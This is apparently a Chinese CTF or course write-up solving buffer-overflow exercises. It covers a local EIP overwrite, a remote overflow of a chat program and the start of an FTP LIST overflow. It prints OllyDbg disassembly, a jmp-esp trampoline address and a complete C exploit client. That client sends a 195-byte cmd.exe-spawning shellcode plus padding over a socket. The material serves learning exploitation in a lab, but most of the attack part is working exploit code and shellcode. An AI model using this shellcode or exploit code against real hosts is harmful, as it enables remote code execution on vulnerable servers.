运行起来后,我们可以填充一些垃圾信息,长度可以随意输入,直到它会弹错.
我们先输入 "123456789123456789123456789123456789"
这时候会弹一个如下提示的错误:
---------------------------
exploit_2.exe - 应用程序错误
---------------------------
"0x35343332" 指令引用的 "0x35343332" 内存。该内存不能为 "read"。
要终止程序,请单击“确定”。
要调试程序,请单击“取消”。
---------------------------
确定 取消
---------------------------
其中 "0x35343332" 就是我们要找的数据了:x86 是小端序,这个 DWORD 在内存里的字节顺序是 0x32 0x33 0x34 0x35,
对应的 ASCII 正好是 "2345",也就是说返回地址被我们输入中的某一段 "2345" 覆盖了.
那么我们就将上面最后一个出现的 "2345" 替换成 "AAAA" 再试试 "1234567891234567891234567891AAAA"
这时候弹提示:
---------------------------
exploit_2.exe - 应用程序错误
---------------------------
"0x41414141" 指令引用的 "0x41414141" 内存。该内存不能为 "read"。
要终止程序,请单击“确定”。
要调试程序,请单击“取消”。
---------------------------
确定 取消
---------------------------
0x41 0x41 0x41 0x41 对应的 ASCII 正好是我们最后输入的 "AAAA"
能看到这样的提示,很关键,这说明我们已经拥有了程序的 EIP 控制权限了. 对照下面的反汇编可以算出栈布局:输入缓冲区在 ebp-18(local.6),只有 8 字节;第 9~24 字节依次覆盖 local.4~local.1 这四个被比较的 DWORD,第 25~28 字节覆盖保存的 ebp,第 29~32 字节(上面的 "AAAA")就是返回地址,所以 32 字节的输入正好打到 EIP.
一开始是想写 shellcode 的,但是在 OD 中发现,程序自身有一段 MessageBox 的调用,
而且提示和标题与要求中的一模一样.再看一下要求,说不得修改程序自身;把返回地址直接改成那段代码的地址(下面反汇编里的 00401099,即四个 cmp 全部通过后的第一条指令),并没有修改程序,于是就直接调用即可了.要注意 00401099 的最高字节是 0x00,按小端序它是返回地址的最后一个字节;如果程序是按字符串读入的,这个 0x00 正好可以由输入末尾的结束符补上.我们来看一下反汇编中的代码.
代码:
; main() of exploit_2.exe as listed by OllyDbg. Frame layout read off the code below:
;   ebp-18 (local.6)   8-byte input buffer (2 bytes from a constant + 6 zero bytes)
;   ebp-10 .. ebp-4    local.4 .. local.1, the four DWORDs compared against the keys
;   ebp+0              saved ebp
;   ebp+4              return address  -> the 29th..32nd input byte lands on EIP
00401010 |> \55 push ebp
00401011 |. 8BEC mov ebp,esp
00401013 |. 83EC 58 sub esp,58
00401016 |. 53 push ebx
00401017 |. 56 push esi
00401018 |. 57 push edi
00401019 |. 8D7D A8 lea edi,[local.22]
0040101C |. B9 16000000 mov ecx,16
00401021 |. B8 CCCCCCCC mov eax,CCCCCCCC
00401026 |. F3:AB rep stos dword ptr es:[edi] ; fills the 0x58-byte frame with 0xCC (typical of an MSVC debug build)
00401028 |. C745 FC DDCCB>mov [local.1],AABBCCDD ; the four keys; each cmp below expects a different value than the one stored here
0040102F |. C745 F8 AADDC>mov [local.2],BBCCDDAA
00401036 |. C745 F4 CCBBA>mov [local.3],DDAABBCC
0040103D |. C745 F0 DDAAB>mov [local.4],CCBBAADD
00401044 |. 66:A1 2C50420>mov ax,word ptr ds:[42502C]
0040104A |. 66:8945 E8 mov word ptr ss:[ebp-18],ax ; input buffer: 2 bytes from a constant ...
0040104E |. 33C9 xor ecx,ecx
00401050 |. 894D EA mov dword ptr ss:[ebp-16],ecx ; ... plus 4 + 2 zero bytes = 8 bytes at ebp-18
00401053 |. 66:894D EE mov word ptr ss:[ebp-12],cx
00401057 |. 68 DC5F4200 push exploit_.00425FDC ; please input the string:
0040105C |. E8 FFE80000 call exploit_.0040F960 ; prints the prompt (one cdecl argument)
00401061 |. 83C4 04 add esp,4
00401064 |. 8D55 E8 lea edx,[local.6]
00401067 |. 52 push edx
00401068 |. 68 28504200 push exploit_.00425028 ; %s
0040106D |. E8 7E000000 call exploit_.004010F0 ; // reads the user input into local.6: the arguments are (&local.6, "%s"), i.e. presumably a scanf("%s")-style unbounded read, not ReadFile as the original note said -- this is the overflow
00401072 |. 83C4 08 add esp,8 ; // cdecl: the caller removes the two arguments
00401075 |. 817D FC AADDC>cmp [local.1],BBCCDDAA ; // key vs. the DWORD our input left at ebp-4 (0x36353433 = "3456" for the 36-digit probe)
0040107C |. 75 38 jnz short exploit_.004010B6 ; // mismatch -> skip the dialog
0040107E |. 817D F8 CCBBA>cmp [local.2],DDAABBCC ; // vs. ebp-8 (0x32313938 = "8912")
00401085 |. 75 2F jnz short exploit_.004010B6 ; // mismatch -> skip the dialog
00401087 |. 817D F4 DDAAB>cmp [local.3],CCBBAADD ; // vs. ebp-C (0x37363534 = "4567")
0040108E |. 75 26 jnz short exploit_.004010B6 ; // mismatch -> skip the dialog
00401090 |. 817D F0 DDCCB>cmp [local.4],AABBCCDD ; // vs. ebp-10 (0x33323139 = "9123")
00401097 |. 75 1D jnz short exploit_.004010B6 ; // mismatch -> skip the dialog
00401099 |. 8BF4 mov esi,esp ; // all four keys matched: the address the hijacked return can point at (its high byte is 0x00)
0040109B |. 6A 00 push 0 ; /Style = MB_OK|MB_APPLMODAL
0040109D |. 68 1C504200 push exploit_.0042501C ; |Exploit2
004010A2 |. 68 D05F4200 push exploit_.00425FD0 ; |Success!
004010A7 |. 6A 00 push 0 ; |hOwner = NULL
004010A9 |. FF15 B4D24200 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
004010AF |. 3BF4 cmp esi,esp ; stack-pointer check after the call (presumably _chkesp)
004010B1 |. E8 9A000000 call exploit_.00401150
004010B6 |> 5F pop edi
004010B7 |. 5E pop esi
004010B8 |. 5B pop ebx
004010B9 |. 83C4 58 add esp,58
004010BC |. 3BEC cmp ebp,esp
004010BE |. E8 8D000000 call exploit_.00401150
004010C3 |. 8BE5 mov esp,ebp
004010C5 |. 5D pop ebp
004010C6 \. C3 retn ; returns to whatever the input placed at ebp+4
第三题:
第三题说明
1. Exploit.exe程序是一个简易的网络聊天工具;
2. 该程序在接收字符串没有进行边界检查,存在缓冲区溢出漏洞;
3. 请你找出bug,并尝试exploit,以打开cmd.exe为成功;
4. 需要简要文字叙述;
5. 提交格式可参考附件。
第三题,其实和第二题差不多的,唯一不同的是,一个是通过ReadFile读取用户输入的.
一个是用socket接收用户输入的.
首先,我们要通过send像第二题那样,来触发错误提示.
这个程序,即可做为客户端,又可以做为服务端. 我们启动两份.
其中一份 在类型处 选择 服务器 然后点 开始监听.
另一份 在类型处 选择 客户端 ,然后填计算机IP,因为我们是在一台电脑上,
我们可以输入回环地址 127.0.0.1 然后点开始监听.
这个时候,我们就可以输入任意的消息内容.然后点发送.图:
从图中,我们可以看出,发送,和接收,都很正常.
我们输入一些垃圾信息测试,发现依然正常发送与接收.那么我们加大垃圾信息,
当试了N次后,在发送N多的数据报时,服务端,终于结束了.但是,并没有弹错误提示.
没有弹错,我们就不能定位关键点了,这个怎么办?
我们只有拿出利器 OD 载入服务端程序,看看他是怎么处理数据包的.我们OD载入服务端程序.
直接运行,然后设置好是服务端. 这样的聊天工具,一般都是用TCP协议的. 我们就对SOCKET的RECV下断点. 下了断点后,发送消息,我们发现,程序并没有断下. 也许是用的M$的那套方法.我们再试试WSARECV. 结果成功断下. (从下面断下时的调用栈可以看到,这次调用来自 wsock32.dll——Winsock 1.1 的兼容层,它内部转调 ws2_32!WSARecv;程序调的应该是 wsock32 里的函数,所以只在 ws2_32!recv 上下断不会命中.)
断下后,我们打开MSDN,看看这个函数的结构.(经常搞网络验证类的程序破解的童鞋,应该相当熟悉了)
WSARecv
The WSARecv function receives data from a connected socket.
int WSARecv(
SOCKET s,
LPWSABUF lpBuffers,
DWORD dwBufferCount,
LPDWORD lpNumberOfBytesRecvd,
LPDWORD lpFlags,
LPWSAOVERLAPPED lpOverlapped,
LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
);
重点,我们看第二个参数.它是一个 LPWSABUF 指针类型的. 其中 WSABUF 又是一个结构体.
typedef struct __WSABUF {
u_long len; // 这里就是缓冲区的大小了.
char FAR *buf; // 缓冲区
} WSABUF, FAR * LPWSABUF;
我们到OD里面看看,他的缓冲区是多大.
断下后:
0012F88C 71A42EA3 /CALL to WSARecv from wsock32.71A42E9E
0012F890 0000021C |Socket = 21C
0012F894 0012F8AC |pBuffers = 0012F8AC
0012F898 00000001 |nBuffers = 1
0012F89C 0012F8C4 |pReceivedCount = 0012F8C4
0012F8A0 0012F8C0 |pFlags = 0012F8C0
0012F8A4 00000000 |pOverlapped = NULL
0012F8A8 00000000 \Callback = NULL
我们跟到0x0012F8AC这个地址处:
0012F8AC 00000400 // 这里就是缓冲区的大小了.
0012F8B0 00A56418 // 缓冲区
我们来整理一下所知道的信息:
1. 缓冲区的大小是 Hex:0x400 Dec:1024.
2. 发送的数据,全部是 ASCII 的.
3. 我们知道数组是以0结尾的. 不过 WSARecv 本身最多只收 0x400 字节,并不会写穿这个缓冲区;真正的溢出应当发生在程序随后把收到的数据当作 C 字符串拷贝到一个更小的栈缓冲区时(后面 stz 给出的 508 字节返回地址偏移也说明目标缓冲区远小于 1024).
设想,如果我们发送的聊天内容接近 1023 个字节,是不是就会把返回地址覆盖掉?
我们来输入 "0123456789" 垃圾信息,来填充.直到我们输入的数据,满够.1023个字节.
温馨提示:可以输入 0123456789 然后复制粘贴N多次,保存到记事本中,然后看文件属性.
实际大小,就是我们输入的长度了.
注意:用上面的方法,
记事本菜单选项中的<格式> --> <自动换行> 选择.尽量去掉勾.
我们连接后输入 垃圾信息,点发送 终于报错了..
---------------------------
chat.exe - 应用程序错误
---------------------------
"0x33323130" 指令引用的 "0x33323130" 内存。该内存不能为 "read"。
要终止程序,请单击“确定”。
要调试程序,请单击“取消”。
---------------------------
确定 取消
---------------------------
我们在输入数据中找最后一次出现的 "0123"(0x33323130 按小端序就是这四个字符),同第二题一样,改成 "aaaa"
连接,发送.又提示错误了.
---------------------------
chat.exe - 应用程序错误
---------------------------
"0x33323130" 指令引用的 "0x33323130" 内存。该内存不能为 "read"。
要终止程序,请单击“确定”。
要调试程序,请单击“取消”。
---------------------------
确定 取消
---------------------------
和上面的提示是一样的.我们再找倒数第二次出现的 0x33323130. 替换成 "aaaa"
---------------------------
chat.exe - 应用程序错误
---------------------------
"0x61616161" 指令引用的 "0x61616161" 内存。该内存不能为 "read"。
要终止程序,请单击“确定”。
要调试程序,请单击“取消”。
---------------------------
确定 取消
---------------------------
终于成功得到服务端程序主控权了
不过这题,不像第二题那么简单.这题,我们要自己写shellcode, 要求是打开cmd.exe 我就不自己写了,真心写的太搓了,去网上找了一个现成的.
虽然我们有了eip控制权限, 可是,思来想去,我们让它往哪跳呢? 这里纠结了很久.
最后,还是要感谢宋天琢妹纸,的提示. 它给了我一个地址. 0x7FFA4512, 让我往这里跳..
半斤八兩 17:45:19
妹纸,那个 发送包的地址,如何定位?
半斤八兩 17:45:29
就是你的Shellcode 你如何得到地址?
stz 17:46:56
buf[508]+"\x12\x45\xfa\x7f"+shellcode
stz 17:47:06
自动定位
半斤八兩 17:47:34
厉害.
半斤八兩 17:47:48
7ffa4512 这个地址我刚GO过去看了,是在线程中的.
GO过去一看,是JMP ESP.妹纸太有才了.我怎么就没有想到.
但是问题又来了,这样,每次启动地址不是会变吗?
我又自作聪明,去 kernel32找 jmp esp - -#
最后经测试,发现,在kenel32下找到的 jmp esp 在虚拟机下测试失败.
但是,妹纸找的地址,在虚拟机下测试,是可以成功的. (多半是因为虚拟机里的 kernel32.dll 版本/补丁级别不同,同一条指令的偏移变了;XP 没有 ASLR,但不同版本的 DLL 之间 gadget 地址并不通用,而 0x7FFA4512 不在任何 DLL 里,不受这个影响.)
在OD alt+m内存窗口中看可以看出, 0x7FFA4512 位于所有模块之外.
是低2G内存中,最高地址部分.图:
黄色圈的地方,是JMP ESP 出现的分页和地址.
红色圈起来的地方,我们可以猜想他在所有 XP SP3下,
是固定不变的,可以做些其它事 (当然,我没有测试过)
JMP ESP 指令正好跳向栈顶,也就是我们溢出后紧跟在返回地址后面的数据.
我们可以精心构造一个溢出包:返回地址填 0x7FFA4512,ret 之后 esp 指向它后面的 4 个字节,jmp esp 就会把这 4 个字节当指令执行.
往哪跳? 当然是我们的 shellcode. 在 OD 中可以看见,
断下来的时候 eax 正好指向我们输入的数据开头.
那么,这 4 个字节写成指令
push eax
jmp [esp]
(50 FF 24 24) 即可——把 eax 压栈再间接跳过去,等价于 jmp eax,直接回到包头的 shellcode.
(注意:下面贴出的代码里 0x7FFA4512 那一行被注释掉了,只剩下 50 FF 24 24 和四个 0x31;按上面的思路,返回地址位置应当是 12 45 FA 7F,后面再接 50 FF 24 24,第四题的代码就是这样排的.)
剩下的,就是构造溢出包和编写shellcode了.
第三题代码:
代码:
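#include <windows.h>
#include <WINSOCK2.H>
#include <stdlib.h>

/* Task 3 client: connects to the chat "server" and sends one oversized
 * message. The layout (shellcode first, digit padding up to the saved return
 * address, then a stub that jumps back to the start of the buffer) is
 * explained in the write-up above. */

/* Winsock 2.2 start-up, from the MSDN WSAStartup example. Returns 0 on
 * success and non-zero when no usable WinSock 2.2 DLL is present (the
 * original returned void, so main() could not notice a failure). */
int IsInitSocket()
{
    WORD wVersionRequested = MAKEWORD(2, 2);
    WSADATA wsaData;
    int err = WSAStartup(wVersionRequested, &wsaData);
    if (err != 0) {
        /* Tell the user that we could not find a usable WinSock DLL. */
        return err;
    }
    /* Confirm that the WinSock DLL supports 2.2. A DLL that also supports
     * newer versions still reports 2.2 here because that is what we asked for. */
    if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2) {
        WSACleanup();
        return -1;
    }
    return 0;
}

/*
 * The message that is sent byte for byte (sizeof, no terminator).
 *
 * Layout:
 *   [0..194]  195-byte cmd.exe shellcode taken from a public source (the
 *             author did not write it). Decoded from the bytes: locate
 *             kernel32 through fs:[0x30] -> PEB -> Ldr -> InMemoryOrderModuleList,
 *             comparing a case-folded ror-13 hash of each BaseDllName against
 *             0x6a4abc5b; walk its export table for "GetProcAddress";
 *             WinExec("cmd", 5); then GetProcAddress("ExitProcess") and call it.
 *   [195..]   digit padding up to the saved return address of the vulnerable
 *             frame; the write-up located that slot by the "0123" pattern
 *             shown in the crash dialog.
 *   tail      see the NOTE(review) at the end of the array.
 */
BYTE szChat[] = {
    // Windows 2000 / 2003 / XP / Vista / 7 generic cmd shellcode
    0xfc, 0x33, 0xd2, 0xb2, 0x30, 0x64, 0xff, 0x32, 0x5a, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b,   // cld; PEB -> Ldr -> InMemoryOrderModuleList
    0x72, 0x28, 0x33, 0xc9, 0xb1, 0x18, 0x33, 0xff, 0x33, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c,   // hash BaseDllName (24 chars, upper-cased)
    0x20, 0xc1, 0xcf, 0x0d, 0x03, 0xf8, 0xe2, 0xf0, 0x81, 0xff, 0x5b, 0xbc, 0x4a, 0x6a, 0x8b, 0x5a,   // ror edi,13 / add; cmp edi,0x6a4abc5b
    0x10, 0x8b, 0x12, 0x75, 0xda, 0x8b, 0x53, 0x3c, 0x03, 0xd3, 0xff, 0x72, 0x34, 0x8b, 0x52, 0x78,   // ebx = DllBase; PE header -> export directory
    0x03, 0xd3, 0x8b, 0x72, 0x20, 0x03, 0xf3, 0x33, 0xc9, 0x41, 0xad, 0x03, 0xc3, 0x81, 0x38, 0x47,   // iterate AddressOfNames
    0x65, 0x74, 0x50, 0x75, 0xf4, 0x81, 0x78, 0x04, 0x72, 0x6f, 0x63, 0x41, 0x75, 0xeb, 0x81, 0x78,   // compare "GetP" "rocA"
    0x08, 0x64, 0x64, 0x72, 0x65, 0x75, 0xe2, 0x49, 0x8b, 0x72, 0x24, 0x03, 0xf3, 0x66, 0x8b, 0x0c,   // "ddre"; ordinal table
    0x4e, 0x8b, 0x72, 0x1c, 0x03, 0xf3, 0x8b, 0x14, 0x8e, 0x03, 0xd3, 0x52, 0x68, 0x78, 0x65, 0x63,   // edx = GetProcAddress; push "xec\1"
    0x01, 0xfe, 0x4c, 0x24, 0x03, 0x68, 0x57, 0x69, 0x6e, 0x45, 0x54, 0x53, 0xff, 0xd2, 0x68, 0x63,   // -> "WinExec"; GetProcAddress(kernel32, "WinExec")
    0x6d, 0x64, 0x01, 0xfe, 0x4c, 0x24, 0x03, 0x6a, 0x05, 0x33, 0xc9, 0x8d, 0x4c, 0x24, 0x04, 0x51,   // "cmd"; push 5 (SW_SHOW); push &"cmd"
    0xff, 0xd0, 0x68, 0x65, 0x73, 0x73, 0x01, 0x8b, 0xdf, 0xfe, 0x4c, 0x24, 0x03, 0x68, 0x50, 0x72,   // WinExec("cmd", 5); build "ExitProcess"
    0x6f, 0x63, 0x68, 0x45, 0x78, 0x69, 0x74, 0x54, 0xff, 0x74, 0x24, 0x20, 0xff, 0x54, 0x24, 0x20,   // GetProcAddress(kernel32, "ExitProcess")
    0x57, 0xff, 0xd0,                                                                                 // ExitProcess(edi)
    // padding (digits); copied verbatim, the exact length places the stub below on the return address
    0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33,
    0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32,
    0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x31, 0x33, 0x32, 0x33, 0x33, 0x33, 0x34, 0x33, 0x35, 0x33, 0x36, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30, 0x33, 0x37, 0x33, 0x38, 0x33, 0x39, 0x33, 0x30,
    // Springboard (the author's candidates, as published):
    //0x13, 0x44, 0x87, 0x7c, 0x12, 0x45, 0xfa, 0x7f,
    //0xb3, 0xb9, 0x42, 0x00, 0x31, 0x31, 0x31, 0x31,
    // push eax / jmp [esp]  (50 FF 24 24 == jump to eax, which points at the start of the message)
    // NOTE(review): as printed, no jmp-esp address precedes this stub, so the
    // saved return address would be overwritten by the stub bytes themselves
    // rather than by 0x7ffa4512 (jmp esp) as the write-up describes and as the
    // task-4 payload does. Presumably the published listing lost that line;
    // re-enable "0x12, 0x45, 0xfa, 0x7f" directly before the stub -- TODO confirm.
    0x50, 0xff, 0x24, 0x24, 0x31, 0x31, 0x31, 0x31
};

DWORD g_dwPort = 0;
char g_szIP[30] = {0};

/* Banner and interactive prompt for the target address. The %29s width
 * matches sizeof(g_szIP) - 1 (the original used an unbounded %s); DWORD is
 * unsigned long, so %lu is the matching conversion. */
void IsDisplay()
{
    system("color 0a & title 西电第三题溢出题 Chat Exp.");
    puts("**************************************");
    puts("* By 半斤八兩 *");
    puts("* Chat exp *");
    puts("* Date 2012.10.06 *");
    puts("**************************************");
    puts("");
    puts("请输入Chat IP:");
    if (scanf("%29s", g_szIP) != 1) {
        g_szIP[0] = '\0';       /* inet_addr() then fails and main() reports it */
    }
    puts("请输入Chat Port:");
    if (scanf("%lu", &g_dwPort) != 1) {
        g_dwPort = 0;           /* connect() to port 0 fails and main() reports it */
    }
}

int main(int argc, char* argv[])
{
    IsDisplay();
    if (IsInitSocket() != 0) {
        puts("WSAStartup failed");
        return 1;
    }

    SOCKET SChat = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    if (SChat == INVALID_SOCKET) {
        puts("socket() failed");
        WSACleanup();
        return 1;
    }

    SOCKADDR_IN sChatAddr = {0};
    sChatAddr.sin_family = AF_INET;
    sChatAddr.sin_addr.S_un.S_addr = inet_addr(g_szIP);
    sChatAddr.sin_port = htons((u_short)g_dwPort);
    if (sChatAddr.sin_addr.S_un.S_addr == INADDR_NONE
        || connect(SChat, (sockaddr*)&sChatAddr, sizeof(sChatAddr)) == SOCKET_ERROR) {
        puts("connect() failed");
        closesocket(SChat);
        WSACleanup();
        return 1;
    }

    /* One send; the array is raw bytes, so sizeof rather than strlen. */
    if (send(SChat, (PCHAR)szChat, sizeof(szChat), 0) != (int)sizeof(szChat)) {
        puts("send() failed");
        closesocket(SChat);
        WSACleanup();
        return 1;
    }
    puts("CmdShell Successful!");   /* only confirms the send, not the shell */
    /* Keep the connection open briefly so the server has read the whole
     * message before we close (presumably why the original paused here). */
    Sleep(5000);
    closesocket(SChat);
    WSACleanup();
    return 0;
}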
第四题:
第四题说明
FTPServer.exe程序是一个简易的FTP服务器;
FTPServer在处理FTP服务器命令时缺少正确的缓冲区边界检查,远程攻击者可以利用这个漏洞以FTP进程权限在系统上执行任意指令;
请你找出bug,并尝试exploit,以打开计算器程序为成功;
需要简要文字叙述;
提交格式可参考第三题给出的附件。
这一题,和第二,第三题,都差不多.
一开始是对 send user send pass 做处理,
发现无法修改EIP.(我没有溢出这方面的经验,是做题的时候,刚学的,所以不知道其它方法)
晚上睡觉的时候,一直在想有没有其它办法,最后想到了,打开M$的FTP.EXE, 输入 HELP.
对里面的命令 一个个测试过去. ,然后对 IAT 里所有容易溢出的字符串函数(strcpy、strcat、sprintf 之类)下 CC 断点.
当测试到 dir 这个命令的时候, 发现调用 strcpy. 后面的,就和第三题分析思路,差不多了.
PS:提交的第一个版本,在虚拟机失败的原因是收发包的时候,没有加Sleep.
分析了一天了. 原因居然是没有延迟...真囧~
通过这次事例, 再一次证明, 虚拟机理论速度比物理机物理速度要快~ (更准确地说这是个时序问题:FTP 的应答可能分几次到达,不等服务端处理完上一条命令就发下一条,几条命令可能被服务端一次 recv 读走或错位处理;固定 Sleep 只是凑巧够用,严格按每条应答的返回码同步会更可靠.) End..
第四题代码:
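// FTP.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <windows.h>
#include <WINSOCK2.H>
#include <stdlib.h>

// code by 半斤八兩
// Task 4 client: logs in to the FTP server on 127.0.0.1:21, announces a data
// port with PORT, then sends one over-long LIST line. Per the write-up the
// server copies the LIST argument with strcpy into a fixed stack buffer, so
// the line overwrites the saved return address with 0x7ffa4512 (jmp esp); the
// bytes after it (push eax / jmp [esp]) bounce execution back to the start of
// the line, where the calc.exe payload sits.
// Reply handling is minimal: each reply is read once and printed, never parsed.

/* Winsock 2.2 start-up, from the MSDN WSAStartup example. Returns 0 on
 * success and non-zero when no usable WinSock 2.2 DLL is present (the
 * original returned void and main() carried on regardless). */
int IsInit()
{
    WORD wVersionRequested = MAKEWORD(2, 2);
    WSADATA wsaData;
    int err = WSAStartup(wVersionRequested, &wsaData);
    if (err != 0) {
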